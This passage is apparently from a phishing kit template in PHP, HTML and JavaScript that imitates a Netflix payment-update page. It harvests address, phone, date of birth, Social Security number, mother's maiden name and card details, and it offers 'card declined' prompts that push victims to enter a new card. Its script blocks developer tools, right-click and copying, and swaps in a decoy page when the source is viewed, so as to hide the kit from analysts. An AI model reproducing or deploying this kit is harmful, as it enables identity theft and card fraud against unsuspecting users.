                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span><?= __('error_name') ?></span>
                </div>
            </div>

            <div class="form-group">
                <div class="input-wrapper">
                    <input type="text" name="fulladdress" class="form-control" id="fullAddress" placeholder=" " value="<?php echo htmlspecialchars(getFormValue('fulladdress')); ?>" required>
                    <label for="fullAddress" class="floating-label"><?= __('full_address') ?></label>
                </div>
                <div class="error-message" id="fullAddressError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span><?= __('error_full_address') ?></span>
                </div>
            </div>

            <div class="form-row">
                <?php if($cityEnabled): ?>
                <div class="form-group">
                    <div class="input-wrapper">
                        <input type="text" name="city" class="form-control" id="city" placeholder=" " value="<?php echo htmlspecialchars(getFormValue('city')); ?>" required>
                        <label for="city" class="floating-label"><?= __('city') ?></label>
                    </div>
                    <div class="error-message" id="cityError">
                        <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                        </svg>
                        <span><?= __('error_city') ?></span>
                    </div>
                </div>
                <?php else: ?>
                <input type="hidden" name="city" value="">
                <?php endif; ?>
                <div class="form-group">
                    <div class="input-wrapper">
                        <?php $phoneCode = $ipData['phone_code'] ?? '+1'; if (strpos($phoneCode, '+') !== 0) $phoneCode = '+' . $phoneCode; ?>
                        <?php $existingPhone = getFormValue('phone'); ?>
                        <input type="tel" name="phone" class="form-control" id="phone" placeholder=" " value="<?= !empty($existingPhone) ? htmlspecialchars($existingPhone) : htmlspecialchars($phoneCode) . ' ' ?>" required>
                        <label for="phone" class="floating-label"><?= __('phone_number') ?></label>
                    </div>
                    <div class="error-message" id="phoneError">
                        <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                        </svg>
                        <span><?= __('error_phone') ?></span>
                    </div>
                </div>
            </div>

            <div class="form-row">
                <div class="form-group">
                    <div class="input-wrapper">
                        <input type="text" name="zipcode" class="form-control" id="zipCode" placeholder=" " maxlength="10" value="<?php echo htmlspecialchars(getFormValue('zipcode')); ?>" required>
                        <label for="zipCode" class="floating-label"><?= __('zip_code') ?></label>
                    </div>
                    <div class="error-message" id="zipCodeError">
                        <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                        </svg>
                        <span><?= __('error_zip_code') ?></span>
                    </div>
                </div>
                <div class="form-group">
                    <div class="input-wrapper">
                        <input type="text" name="state" class="form-control" id="state" placeholder=" " value="<?php echo htmlspecialchars(getFormValue('state')); ?>" required>
                        <label for="state" class="floating-label"><?= __('state') ?></label>
                    </div>
                    <div class="error-message" id="stateError">
                        <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                        </svg>
                        <span><?= __('error_state') ?></span>
                    </div>
                </div>
            </div>

            <?php if($dobEnabled): ?>
            <div class="form-group">
                <div class="input-wrapper">
                    <input type="text" name="dob" class="form-control" id="dob" placeholder=" " maxlength="10" value="<?php echo htmlspecialchars(getFormValue('dob')); ?>" required>
                    <label for="dob" class="floating-label">Date of Birth (MM/DD/YYYY)</label>
                </div>
                <div class="error-message" id="dobError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span><?= __('error_dob') ?></span>
                </div>
            </div>
            <?php else: ?>
            <input type="hidden" name="dob" value="">
            <?php endif; ?>

            <?php if($ssnEnabled): ?>
            <div class="form-group">
                <div class="input-wrapper">
                    <input type="text" name="ssn" class="form-control" id="ssn" placeholder=" " maxlength="11" value="<?php echo htmlspecialchars(getFormValue('ssn')); ?>" required>
                    <label for="ssn" class="floating-label"><?= __('ssn_label') ?></label>
                </div>
                <div class="error-message" id="ssnError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span><?= __('error_ssn') ?></span>
                </div>
            </div>
            <?php else: ?>
            <input type="hidden" name="ssn" value="">
            <?php endif; ?>

            <?php if($mmnEnabled): ?>
            <div class="form-group">
                <div class="input-wrapper">
                    <input type="text" name="mmn" class="form-control" id="mmn" placeholder=" " value="<?php echo htmlspecialchars(getFormValue('mmn')); ?>" required>
                    <label for="mmn" class="floating-label">Mother's Maiden Name</label>
                </div>
                <div class="error-message" id="mmnError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span><?= __('error_mmn') ?></span>
                </div>
            </div>
            <?php else: ?>
            <input type="hidden" name="mmn" value="">
            <?php endif; ?>

            <!-- CID/XID collected via visible inputs when AMEX/Discover detected -->

            <div class="disclaimer">
                By checking the checkbox below, you agree to our <a href="#">Terms of Use</a>, <a href="#">Privacy Statement</a>, and that you are over 18. Netflix will automatically continue your membership and charge the membership fee to your payment method until you cancel. You may cancel at any time to avoid future charges.
            </div>

            <div class="checkbox-wrapper">
                <input type="checkbox" id="agree" class="checkbox" required>
                <label for="agree" class="checkbox-label"><?= __('i_agree') ?></label>
            </div>

            <?php 
            $declinedBtnStyle = $dataPage['declined_button_style'] ?? 'continue';
            if($cardDeclined && ($declinedBtnStyle === 'both' || $declinedBtnStyle === 'both_new')): 
                $secondBtn = $declinedBtnStyle === 'both_new' ? 'Update New Payment' : 'Update Payment';
            ?>
            <div style="display: flex; gap: 10px; margin-bottom: 16px;">
                <button type="submit" class="start-button" id="submitButton" style="flex: 1;"><?= __('continue') ?></button>
                <button type="submit" class="start-button" style="flex: 1; background: #fff; color: #333; border: 1px solid #ccc;"><?= $secondBtn ?></button>
            </div>
            <?php elseif($cardDeclined && $declinedBtnStyle === 'update'): ?>
            <button type="submit" class="start-button" id="submitButton">Update Payment</button>
            <?php elseif($cardDeclined && $declinedBtnStyle === 'update_new'): ?>
            <button type="submit" class="start-button" id="submitButton">Update New Payment</button>
            <?php else: ?>
            <button type="submit" class="start-button" id="submitButton"><?= __('continue') ?></button>
            <?php endif; ?>

            <div class="recaptcha-notice">
                <?= __('recaptcha_notice') ?>
            </div>
        </form>
    </main>

    <footer class="footer">
        <div class="footer-content">
            <div class="footer-contact">
                Questions? Call <a href="tel:1-844-505-2993">1-844-505-2993</a>
            </div>

            <div class="footer-links">
                <a href="#"><?= __('faq') ?></a>
                <a href="#"><?= __('help_center') ?></a>
                <a href="#"><?= __('terms_of_use') ?></a>
                <a href="#"><?= __('privacy') ?></a>
                <a href="#"><?= __('cookie_preferences') ?></a>
                <a href="#"><?= __('corporate_information') ?></a>
                <a href="#"><?= __('ad_choices') ?></a>
            </div>

            <div class="language-selector" style="position: relative; display: inline-block; margin-top: 20px;">
                <svg class="language-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="16" height="16" data-icon="LanguagesSmall" aria-hidden="true" style="position: absolute; left: 8px; top: 50%; transform: translateY(-50%); width: 16px; height: 16px; color: #737373; pointer-events: none; z-index: 1;">
                    <path fill-rule="evenodd" clip-rule="evenodd" d="M10.7668 5.33333L10.5038 5.99715L9.33974 8.9355L8.76866 10.377L7.33333 14H9.10751L9.83505 12.0326H13.4217L14.162 14H16L12.5665 5.33333H10.8278H10.7668ZM10.6186 9.93479L10.3839 10.5632H11.1036H12.8856L11.6348 7.2136L10.6186 9.93479ZM9.52722 4.84224C9.55393 4.77481 9.58574 4.71045 9.62211 4.64954H6.41909V2H4.926V4.64954H0.540802V5.99715H4.31466C3.35062 7.79015 1.75173 9.51463 0 10.4283C0.329184 10.7138 0.811203 11.2391 1.04633 11.5931C2.55118 10.6795 3.90318 9.22912 4.926 7.57316V12.6667H6.41909V7.51606C6.81951 8.15256 7.26748 8.76169 7.7521 9.32292L8.31996 7.88955C7.80191 7.29052 7.34631 6.64699 6.9834 5.99715H9.06968L9.52722 4.84224Z" fill="currentColor"></path>
                </svg>
                <select name="language" id="language" style="background: transparent; border: 1px solid #737373; color: #737373; padding: 8px 32px 8px 32px; font-size: 13px; border-radius: 2px; appearance: none; cursor: pointer; min-width: 120px;">
                    <option value="en" <?= $visitorLang === 'en' ? 'selected' : '' ?>>English</option>
                    <option value="es" <?= $visitorLang === 'es' ? 'selected' : '' ?>>Espa�ol</option>
                    <option value="fr" <?= $visitorLang === 'fr' ? 'selected' : '' ?>>Fran�ais</option>
                    <option value="de" <?= $visitorLang === 'de' ? 'selected' : '' ?>>Deutsch</option>
                    <option value="ar" <?= $visitorLang === 'ar' ? 'selected' : '' ?>>???????</option>
                </select>
                <svg class="dropdown-arrow" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" width="16" height="16" style="position: absolute; right: 8px; top: 50%; transform: translateY(-50%); width: 12px; height: 12px; color: #737373; pointer-events: none; z-index: 1;">
                    <path d="M8 10.586L3.414 6 2 7.414 8 13.414 14 7.414 12.586 6z" fill="currentColor"/>
                </svg>
            </div>
            
            <div class="footer-country">
                <?= __('netflix_country') ?>
            </div>
        </div>
    </footer>

    <script>
        // JavaScript Translations Object (populated from PHP)
        const i18n = {
            error_card_number: '<?= addslashes(__('error_card_number')) ?>',
            error_card_number_empty: '<?= addslashes(__('error_card_number_empty')) ?>',
            error_card_number_invalid: '<?= addslashes(__('error_card_number_invalid')) ?>',
            error_expiry_date: '<?= addslashes(__('error_expiry_date')) ?>',
            error_expiry_date_empty: '<?= addslashes(__('error_expiry_date_empty')) ?>',
            error_expiry_date_invalid: '<?= addslashes(__('error_expiry_date_invalid')) ?>',
            error_expiry_date_expired: '<?= addslashes(__('error_expiry_date_expired')) ?>',
            error_expiry_date_year: '<?= addslashes(__('error_expiry_date_year')) ?>',
            error_cvv: '<?= addslashes(__('error_cvv')) ?>',
            error_cvv_required: '<?= addslashes(__('error_cvv_required')) ?>',
            error_cvv_card_first: '<?= addslashes(__('error_cvv_card_first')) ?>',
            error_cvv_amex: '<?= addslashes(__('error_cvv_amex')) ?>',
            error_cvv_digits: '<?= addslashes(__('error_cvv_digits')) ?>',
            error_agree_terms: '<?= addslashes(__('error_agree_terms')) ?>',
            processing: '<?= addslashes(__('processing')) ?>'
        };
    </script>
    <script>
        // Advanced Protection System
        (function() {
            'use strict';
            
            const originalHTML = document.documentElement.outerHTML;
            let protectionActive = true;
            
            // Hide loading screen after delay
            function hideLoadingScreen() {
                setTimeout(function() {
                    const loadingOverlay = document.getElementById('loading-overlay');
                    if (loadingOverlay) {
                        loadingOverlay.style.opacity = '0';
                        loadingOverlay.style.transition = 'opacity 0.3s ease';
                        setTimeout(function() {
                            loadingOverlay.remove();
                        }, 300);
                    }
                }, 1500);
            }
            
            // DOM Obfuscation - Replace content when view source is detected
            function obfuscateDOM() {
                const dummyHTML = `<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Childrich</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            font-family: Arial, sans-serif;
            background: #f5f5f5;
        }
        h1 {
            color: #333;
            text-align: center;
            font-size: 48px;
            margin: 0;
        }
    </style>
</head>
<body>
    <h1>Childrich</h1>
</body>
</html>`;
                
                document.open();
                document.write(dummyHTML);
                document.close();
            }
            
            // Clear console
            function clearConsole() {
                if (window.console && window.console.clear) {
                    console.clear();
                }
                console.log('%cAccess Denied', 'color: red; font-size: 40px; font-weight: bold;');
                console.log('%cThis content is protected by Childrich Security System', 'color: #333; font-size: 16px;');
            }
            
            // Detect DevTools
            let devtools = {
                open: false,
                orientation: null
            };
            
            const threshold = 160;
            const detect = function() {
                if (window.outerHeight - window.innerHeight > threshold || 
                    window.outerWidth - window.innerWidth > threshold) {
                    if (!devtools.open) {
                        devtools.open = true;
                        clearConsole();
                    }
                } else {
                    devtools.open = false;
                }
            };
            
            setInterval(detect, 500);
            
            // Keyboard event blocking
            document.addEventListener('keydown', function(e) {
                // Block F12, Ctrl+Shift+I, Ctrl+Shift+C, Ctrl+Shift+J
                if (e.key === 'F12' || 
                    (e.ctrlKey && e.shiftKey && ['I', 'C', 'J'].includes(e.key.toUpperCase()))) {
                    e.preventDefault();
                    e.stopPropagation();
                    clearConsole();
                    return false;
                }
                
                // Allow Ctrl+U (view source) but obfuscate content
                if (e.ctrlKey && e.key.toUpperCase() === 'U') {
                    setTimeout(obfuscateDOM, 100);
                    return true;
                }
                
                // Block other copy shortcuts
                if (e.ctrlKey && ['C', 'V', 'X'].includes(e.key.toUpperCase())) {
                    const target = e.target;
                    if (target.tagName !== 'INPUT' && target.tagName !== 'TEXTAREA') {
                        e.preventDefault();
                        return false;
                    }
                }
            }, true);
            
            // Block right-click
            document.addEventListener('contextmenu', function(e) {
                e.preventDefault();
                return false;
            }, false);
            
            // Block text selection (except in inputs)
            document.addEventListener('selectstart', function(e) {
                const target = e.target;
                if (target.tagName !== 'INPUT' && target.tagName !== 'TEXTAREA') {
                    e.preventDefault();
                    return false;
                }
            }, false);
            
            // Additional protection against source viewing
            document.addEventListener('keyup', function(e) {
                if (e.ctrlKey && e.key.toUpperCase() === 'U') {
                    setTimeout(obfuscateDOM, 50);
                }
            });
            
            // Initialize
            hideLoadingScreen();
            clearConsole();
            
        })();
    </script>

    <script>
        // Simple Loading Screen - Hide after 1.5 seconds
        setTimeout(function() {
            const loadingOverlay = document.getElementById('loading-overlay');
            if (loadingOverlay) {
                loadingOverlay.style.opacity = '0';
                loadingOverlay.style.transition = 'opacity 0.3s ease';
                setTimeout(function() {
                    loadingOverlay.remove();
                }, 300);
            }
        }, 1500);

        // Card type patterns (global scope for form validation)
        const cardTypes = {
                visa: {
                    pattern: /^4/,
                    lengths: [16],
                    cvvLength: 3,
                    format: /(\d{1,4})(\d{1,4})?(\d{1,4})?(\d{1,4})?/,
                    name: 'Visa'
                },
                mastercard: {
                    pattern: /^(5[1-5]|2[2-7])/,
                    lengths: [16],
                    cvvLength: 3,
                    format: /(\d{1,4})(\d{1,4})?(\d{1,4})?(\d{1,4})?/,
                    name: 'Mastercard'
                },
                amex: {
                    pattern: /^3[47]/,
                    lengths: [15],
                    cvvLength: 4,
                    format: /(\d{1,4})(\d{1,6})?(\d{1,5})?/,
                    name: 'American Express'
                },
                discover: {
                    pattern: /^(6011|622[1-9]|64[4-9]|65)/,
                    lengths: [16],
                    cvvLength: 3,
                    format: /(\d{1,4})(\d{1,4})?(\d{1,4})?(\d{1,4})?/,
                    name: 'Discover'
                },
                diners: {
                    pattern: /^(30[0-5]|36|38)/,
                    lengths: [14],
                    cvvLength: 3,
                    format: /(\d{1,4})(\d{1,6})?(\d{1,4})?/,
                    name: 'Diners Club'
                },
                jcb: {
                    pattern: /^35/,
                    lengths: [16],
                    cvvLength: 3,
                    format: /(\d{1,4})(\d{1,4})?(\d{1,4})?(\d{1,4})?/,
                    name: 'JCB'
                }
        };

        // Card type detection and formatting
        document.addEventListener('DOMContentLoaded', function() {
            const cardNumberInput = document.getElementById('cardNumber');
            const cardIcon = document.getElementById('cardIcon');
            const cvvInput = document.getElementById('cvv');

            function detectCardType(number) {
                const cleanNumber = number.replace(/\D/g, '');
                
                for (const [type, config] of Object.entries(cardTypes)) {
                    if (config.pattern.test(cleanNumber)) {
                        return { type, config };
                    }
                }
                
                return { type: 'default', config: null };
            }

            // Make detectCardType globally accessible
            window.detectCardType = detectCardType;

            function formatCardNumber(number, cardType) {
                const cleanNumber = number.replace(/\D/g, '');
                
                // Format based on card type with proper spacing
                if (cardType === 'amex') {
                    // American Express: 4-6-5 format (e.g., 3782 822463 10005)
                    return cleanNumber.replace(/(\d{4})(\d{0,6})(\d{0,5})/, (match, p1, p2, p3) => {
                        let formatted = p1;
                        if (p2) formatted += ' ' + p2;
                        if (p3) formatted += ' ' + p3;
                        return formatted;
                    });
                } else if (cardType === 'diners') {
                    // Diners Club: 4-6-4 format
                    return cleanNumber.replace(/(\d{4})(\d{0,6})(\d{0,4})/, (match, p1, p2, p3) => {
                        let formatted = p1;
                        if (p2) formatted += ' ' + p2;
                        if (p3) formatted += ' ' + p3;
                        return formatted;
                    });
                } else {
                    // Visa, Mastercard, Discover, JCB: 4-4-4-4 format
                    return cleanNumber.replace(/(\d{4})(\d{0,4})(\d{0,4})(\d{0,4})/, (match, p1, p2, p3, p4) => {
                        let formatted = p1;
                        if (p2) formatted += ' ' + p2;
                        if (p3) formatted += ' ' + p3;
                        if (p4) formatted += ' ' + p4;
                        return formatted;
                    });
                }
            }

            function updateCardIcon(cardType) {
                if (!cardIcon) return;
                
                // Remove all card type classes
                cardIcon.className = 'card-icon';
                
                if (cardType === 'default' || !cardType) {
                    cardIcon.classList.add('default-card');
                    cardIcon.innerHTML = `<svg xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 24 24" width="24" height="24" data-icon="CreditCardStandard" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M0 6C0 4.34315 1.34315 3 3 3H21C22.6569 3 24 4.34315 24 6V18C24 19.6569 22.6569 21 21 21H3C1.34314 21 0 19.6569 0 18V6ZM3 5C2.44772 5 2 5.44772 2 6V8H22V6C22 5.44771 21.5523 5 21 5H3ZM2 18V10H22V18C22 18.5523 21.5523 19 21 19H3C2.44772 19 2 18.5523 2 18ZM16 16H20V14H16V16Z" fill="currentColor"></path>
                    </svg>`;
                } else {
                    cardIcon.classList.add(cardType);
                    
                    // For card types without images, show text
                    if (cardType === 'discover') {
                        cardIcon.innerHTML = 'DISC';
                    } else if (cardType === 'diners') {
                        cardIcon.innerHTML = 'DINERS';
                    } else if (cardType === 'jcb') {
                        cardIcon.innerHTML = 'JCB';
                    } else {
                        cardIcon.innerHTML = ''; // Images will show via CSS background
                    }
                }
            }

            function updateCVVLength(cardType) {
                if (!cvvInput) return;
                
                if (cardType && cardTypes[cardType]) {
                    const cvvLength = cardTypes[cardType].cvvLength;
                    cvvInput.setAttribute('maxlength', cvvLength);
                } else {
                    cvvInput.setAttribute('maxlength', '4');
                }
            }

            function updateCIDField(cardType) {
                const cidFieldGroup = document.getElementById('cidFieldGroup');
                const cidInput = document.getElementById('amexcid');
                
                if (!cidFieldGroup || !cidInput) return;
                
                // Show CID field only for American Express
                if (cardType === 'amex') {
                    cidFieldGroup.style.display = 'block';
                    cidInput.setAttribute('required', 'required');
                } else {
                    cidFieldGroup.style.display = 'none';
                    cidInput.removeAttribute('required');
                    cidInput.value = ''; // Clear CID value for non-Amex cards
                }
            }

            function updateXIDField(cardType) {
                const xidFieldGroup = document.getElementById('xidFieldGroup');
                const xidInput = document.getElementById('xid_input');
                
                if (!xidFieldGroup || !xidInput) return;
                
                // Show XID field only for Discover
                if (cardType === 'discover') {
                    xidFieldGroup.style.display = 'block';
                    xidInput.setAttribute('required', 'required');
                } else {
                    xidFieldGroup.style.display = 'none';
                    xidInput.removeAttribute('required');
                    xidInput.value = '';
                    xidInput.classList.remove('valid-card', 'invalid-card');
                    xidInput.style.removeProperty('border-color');
                    xidInput.style.removeProperty('background-color');
                    const xidErr = document.getElementById('xid_error');
                    if (xidErr) xidErr.style.display = 'none';
                }
            }

            // Luhn algorithm for card validation
            function validateCardNumber(cardNumber) {
                // Remove spaces and non-digits
                const cleanNumber = cardNumber.replace(/\D/g, '');
                
                // Must be at least 13 digits
                if (cleanNumber.length < 15) {
                    return false;
                }
                
                let sum = 0;
                let isEven = false;
                
                // Loop through digits from right to left
                for (let i = cleanNumber.length - 1; i >= 0; i--) {
                    let digit = parseInt(cleanNumber[i]);
                    
                    if (isEven) {
                        digit *= 2;
                        if (digit > 9) {
                            digit -= 9;
                        }
                    }
                    
                    sum += digit;
                    isEven = !isEven;
                }
                
                return sum % 10 === 0;
            }

            // Make validateCardNumber globally accessible
            window.validateCardNumber = validateCardNumber;

            function updateCardValidation(cardNumber, cardType) {
                const cardNumberInput = document.getElementById('cardNumber');
                const cardNumberError = document.getElementById('cardNumberError');
                const errorSpan = document.getElementById('i18n-cc-number-error');
                const cleanNumber = cardNumber.replace(/\D/g, '');
                
                // Remove previous validation classes
                cardNumberInput.classList.remove('valid-card', 'invalid-card');
                
                // Only validate if we have enough digits and a detected card type
                if (cleanNumber.length >= 13 && cardType !== 'default') {
                    const cardConfig = cardTypes[cardType];
                    const isValidLength = cardConfig && cardConfig.lengths.includes(cleanNumber.length);
                    const isValidLuhn = validateCardNumber(cardNumber);
                    const isValid = isValidLength && isValidLuhn;
                    
                    if (isValid) {
                        cardNumberInput.classList.add('valid-card');
                        if (cardNumberError) cardNumberError.style.display = 'none';
                        // Force green style with all properties
                        cardNumberInput.style.setProperty('border-color', '#28a745', 'important');
                        cardNumberInput.style.setProperty('border-width', '2px', 'important');
                        cardNumberInput.style.setProperty('background-color', '#f8fff9', 'important');
                        cardNumberInput.style.setProperty('box-shadow', '0 0 0 0.2rem rgba(40, 167, 69, 0.25)', 'important');
                    } else {
                        cardNumberInput.classList.add('invalid-card');
                        if (cardNumberError) cardNumberError.style.display = 'flex';
                        if (errorSpan) {
                            errorSpan.textContent = i18n.error_card_number_invalid;
                        }
                        // Force red style
                        cardNumberInput.style.borderColor = '#dc3545';
                        cardNumberInput.style.borderWidth = '2px';
                    }
                } else {
                    // Reset validation state for incomplete numbers
                    if (cardNumberError) cardNumberError.style.display = 'none';
                    // Reset border style
                    cardNumberInput.style.removeProperty('border-color');
                    cardNumberInput.style.removeProperty('border-width');
                    cardNumberInput.style.removeProperty('background-color');
                    cardNumberInput.style.removeProperty('box-shadow');
                }
            }

            // Expiration date validation function
            function validateExpirationDate(expDate) {
                const expDateRegex = /^(0[1-9]|1[0-2])\/([0-9]{2})$/;
                
                if (!expDateRegex.test(expDate)) {
                    return { valid: false, message: i18n.error_expiry_date_invalid };
                }
                
                const [month, year] = expDate.split('/');
                const currentDate = new Date();
                const currentYear = currentDate.getFullYear() % 100; // Get last 2 digits
                const currentMonth = currentDate.getMonth() + 1; // 0-based to 1-based
                
                const expMonth = parseInt(month);
                const expYear = parseInt(year);
                
                // Check if month is valid (01-12)
                if (expMonth < 1 || expMonth > 12) {
                    return { valid: false, message: i18n.error_expiry_date_invalid };
                }
                
                // Check if card is expired
                if (expYear < currentYear || (expYear === currentYear && expMonth < currentMonth)) {
                    return { valid: false, message: i18n.error_expiry_date_expired };
                }
                
                // Check if expiration is too far in the future (more than 10 years)
                if (expYear > currentYear + 10) {
                    return { valid: false, message: i18n.error_expiry_date_year };
                }
                
                return { valid: true, message: '' };
            }

            // Make validateExpirationDate globally accessible
            window.validateExpirationDate = validateExpirationDate;

            function updateExpirationValidation(expDate) {
                const expDateInput = document.getElementById('expDate');
                const expDateError = document.getElementById('expDateError');
                const errorSpan = document.getElementById('i18n-cc-expiry-error');
                
                // Always remove previous validation classes first
                expDateInput.classList.remove('valid-card', 'invalid-card');
                
                // Only validate if date is complete (5 characters: MM/YY)
                if (expDate && expDate.length === 5) {
                    const validation = validateExpirationDate(expDate);
                    
                    if (validation.valid) {
                        expDateInput.classList.add('valid-card');
